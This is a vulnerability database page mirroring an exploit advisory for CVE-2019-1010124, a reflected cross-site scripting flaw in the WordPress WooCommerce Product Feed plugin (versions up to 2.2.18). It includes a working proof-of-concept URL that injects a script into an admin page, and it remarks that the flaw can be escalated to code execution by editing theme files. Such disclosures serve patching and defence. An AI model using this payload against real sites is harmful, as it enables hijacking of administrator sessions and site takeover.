Vulners
Lucene search
WordPress WooCommerce Product Feed 2.2.18 Cross Site Scripting
🗓️ 30 Aug 2019 00:00:00Reported by Damian EbeltiesType 
packetstorm🔗 packetstormsecurity.com👁 231 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | WordPress WooCommerce Product Feed 2.2.18 Plugin - Cross-Site Scripting Vulnerability | 30 Aug 201900:00 | – | zdt |
 | WordPress WebAppick WooCommerce Product Feed Cross-Site Scripting Vulnerability | 23 Jul 201900:00 | – | cnvd |
 | CVE-2019-1010124 | 23 Jul 201900:00 | – | cve |
 | CVE-2019-1010124 | 23 Jul 201900:00 | – | cvelist |
 | WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting | 30 Aug 201900:00 | – | exploitdb |
 | EUVD-2019-1870 | 7 Oct 202500:30 | – | euvd |
 | WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting | 30 Aug 201900:00 | – | exploitpack |
 | CVE-2019-1010124 | 23 Jul 201913:15 | – | nvd |
 | WordPress WooCommerce Product Feed plugin <= 3.1.14 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability | 30 Aug 201900:00 | – | patchstack |
 | Cross site scripting | 23 Jul 201913:15 | – | prion |
10
`# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting
# Date: 30 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/
# Version: <= 2.2.18
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-1010124
The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,
which leads to Cross-Site Scripting in the Admin Panel.
Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme
files via (for example) XHR requests with included Javascript.
Proof-of-Concept:
https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Aug 2019 00:00Current
5.7Medium risk
Vulners AI Score5.7
EPSS0.0026